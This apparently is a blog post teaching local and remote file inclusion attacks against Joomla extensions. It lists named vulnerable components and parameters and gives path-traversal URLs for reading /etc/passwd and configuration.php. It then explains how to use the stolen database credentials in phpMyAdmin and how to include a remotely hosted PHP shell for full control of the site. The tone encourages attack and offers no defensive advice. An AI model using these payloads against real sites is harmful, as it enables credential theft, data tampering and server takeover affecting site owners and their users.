Joomla LFI Local File Inclusions Attack | Joomla RFI Remote File Inclusions Attack
By Valentin
Examples for Joomla local file inclusions
Local file inclusions are very funny. You tell the website what you want to see. Awesome! You want to view the configuration file which contains the database login credentials? No problem.
You want to view the /etc/passwd file if Joomla is hosted on a Linux box? You can do that.
Local file inclusions are also a common problem in Joomla extensions. Many of them are vulnerable for this type of attack and some of them never get fixed. This may lead to a server hack, which is not funny any more - at least for the system administrator.
A typical URL being vulnerable to LFI looks like this:
index.php?option=com_blablubb&Item=2&view=guestbookpage
Typically most of the vulnerable parameters are this one:
- controller
- view
- layout
- page
To give you some proper understanding of typical affected
URLs I provide you with some examples I found earlier this year:
URL: index.php?option=com_jejob&view=some_value
Vulnerable Parameter: view
URL: index.php?option=com_jeajaxeventcalendar&view=some_value
Vulnerable Parameter: view
URL: index.php?option=com_jradio&controller=some_value
Vulnerable Parameter: controller
((I didn't find this one.))
Now let's see how we can use this:
index.php?option=com_jradio&controller=../../../../etc/passwd
In this case we need to use the famous Nullbyte which helps us to bypass a restriction which is set in the responsible PHP script of the component.
In the example above the controller parameter is used to include a file from the local hard disk. This file contains useful information for us.
If you are not familiar with local file inclusions I recommend you look a tutorial up since I will not explain any details here.
Now with the knowledge about a LFI vulnerability within a Joomla component, we can try to access the configuration.php of Joomla. This file contains very very interesting information.
Since many LFIs also reveal PHP source code, we try this one:
index.php?option=com_blabla&view=../../../configuration.php
The source code of the file is shown and we receive the login data for the current database user. Now find a PHPMyAdmin login on the same server and try to login with this data.
You now have access to all Joomla tables and can basically do what you want.
Examples for Joomla remote file inclusions
A typical RFI URL looks like a LFI URL. In order to give you a better feeling of how to see a RFI vulner-ability within seconds, I show you some examples
URL: index.php?option=com_sef&Itemid=&mosConfig.absolute.path=.
Vulnerable Parameter: &mosConfig.absolute.path
URL: index.php?option=com_jomestate&task=.
Vulnerable Parameter: task
When you found a RFI vulnerability, try to include your PHP shell which is hosted on another box. Once you uploaded it, you are able to browse all Joomla files and download them, change them, remove them...
No Joomla installation is safe when there is an exploited RFI.
No comments:
Post a Comment